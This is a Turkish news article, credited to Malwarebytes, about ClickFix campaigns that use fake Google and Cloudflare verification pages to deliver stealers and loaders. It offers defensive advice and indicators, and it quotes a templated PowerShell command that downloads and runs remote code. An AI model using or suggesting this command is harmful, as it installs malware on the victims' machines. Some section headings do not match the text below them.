Siber güvenlik dünyasında sürekli evrim geçiren tehditler arasında ClickFix saldırıları, kullanıcıların kendi elleriyle kötü amaçlı komutlar çalıştırmasını sağlayarak öne çıkıyor. Son dönemde tespit edilen bir kampanya, sahte Google ve Cloudflare doğrulama sayfaları kullanarak kurbanları kandırıyor. Bu sayfalar, ziyaretçilere 'insan olduğunuzu kanıtlayın' veya 'bir sorunu çözün' gibi bahanelerle PowerShell komutlarını kopyalayıp çalıştırmalarını söylüyor. Tek bir hata, şifrelerden hassas verilere kadar her şeyi çalan zararlı yazılımların bulaşmasına yol açabiliyor.
Araştırmacılar, aynı altyapıyı kullanan birden fazla kampanya keşfetti. Bu kampanyalar; HijackLoader, StealC, Remus, Amatera Stealer, CastleLoader, NetSupport ve Rust tabanlı bir bilgi hırsızı gibi çeşitli kötü amaçlı yazılımları dağıtıyor. Özellikle dikkat çeken bir enfeksiyon zincirinde, meşru Franz mesajlaşma uygulamasının truva atı versiyonu kullanılıyor. Bu versiyon, daha önce belgelenmemiş ResiLoader adlı bir yükleyici indiriyor; yükleyici önce güvenlik yazılımlarını devre dışı bırakıyor, ardından StealC bilgi hırsızını devreye sokuyor.
ClickFix saldırılarından korunmanın en etkili yolu, temel güvenlik prensiplerine bağlı kalmaktan geçiyor. Asla bir web sitesinden gördüğünüz komutları, özellikle PowerShell veya Terminal komutlarını, doğrudan kopyalayıp çalıştırmayın. Google, Cloudflare ve Microsoft gibi meşru hizmetler, sizden asla 'insan olduğunuzu kanıtlamak' için PowerShell komutu çalıştırmanızı istemez. Sahte doğrulama sayfaları genellikle geri sayım sayaçları, ziyaretçi sayıları veya uyarı mesajlarıyla sizi acele etmeye zorlar. Bu tür aciliyet hissi yaratan durumlarda hemen durup düşünün.
Detaylar ve Etkileri
Güvenlik yazılımınızı güncel tutmak da kritik öneme sahip. Gerçek zamanlı koruma ve web koruması özellikleri, kötü niyetli web sitelerine erişmeden sizi uyarabilir. Ayrıca, beklenmedik teknik talimatlarla karşılaştığınızda, talimatları resmi destek kanallarından doğrulamayı alışkanlık haline getirin. Malwarebytes Browser Guard gibi araçlar, bir web sitesinin panonuza içerik kopyalamaya çalıştığında sizi uyararak ClickFix sayfalarına karşı ek bir koruma katmanı sağlar.
Teknik Analiz
Teknik analizler, bu kampanyaların en az 2025'in sonlarından beri aktif olduğunu ve çeşitli sahte Google ile Cloudflare sayfaları kullandığını gösteriyor. Saldırganlar sürekli yeni dağıtım yöntemleri ve yükler deniyor. Çoğu kampanyada ortak özellikler arasında C:\ProgramData\Zooms klasörünün kullanılması, benzer PowerShell ClickFix komutları, Cloudflare R2 bucket'ları ile yük dağıtımı ve Dedik Services Limited ASN'sine ait IP adresleri yer alıyor. Ancak bu göstergeler zamanla değişiyor ve her enfeksiyon zincirinde aynı olmuyor.
Nasıl Önlem Alınmalı?
Kullanıcıya kopyalatılan son komut genellikle şu kalıpta oluyor: powershell -c "iex(irm '{IP}:{Port}/{Random Path}' -UseBasicParsing)". Port ve yol her vakada bulunmuyor; kullanılan portlar arasında 6600, 9900, 5506, 7895, 7493, 149, 8442 gibi rastgele değerler var. Bu komutları çalıştırmak için Google ve Cloudflare temalı çeşitli ClickFix şablonları kullanılıyor. Bazı durumlarda PowerShell komutunun IClickFix çerçevesi aracılığıyla dağıtıldığı da tespit edildi.
Kampanyaların dağıtımında; süresi dolmuş ve tekrar satın alınmış eski web siteleri, Cloudflare Pages (.pages.dev alt alan adları), güvenliği ihlal edilmiş web siteleri ve QR kodu veya dosya erişimi gibi sahte hizmetler kullanılıyor. Google ClickFix tuzaklarında, reCAPTCHA doğrulamasını taklit eden sayfalar yer alıyor. Bu sayfalar, genellikle eski kayıtlara sahip olup yakın zamanda yeni IP adreslerine yönlendirilmiş domainler üzerinde barındırılıyor. URL'lerde 'zoneid', 'cost', 'device' gibi parametreler bulunuyor.
Gelecekte Ne Bekleniyor?
Cloudflare Pages üzerinden dağıtılan bir diğer yöntemde ise HTML sayfası XOR ile obfuscate edilmiş ve 'SECURITY GATEWAY' adı verilen bir kod içeriyor. Bu kod, saldırganların komutu uzaktan veya yerel olarak almasını sağlıyor. Bazı domainlerin birden fazla zararlı yazılım dağıttığı da gözlemlenmiş durumda. Bu kampanyaların sürekli güncellendiğini ve yeni yükler eklendiğini unutmamak gerekiyor. Kullanıcıların en güncel güvenlik önlemlerini alması ve şüpheli durumlarda dikkatli olması hayati önem taşıyor.
Kaynak: malwarebytes.com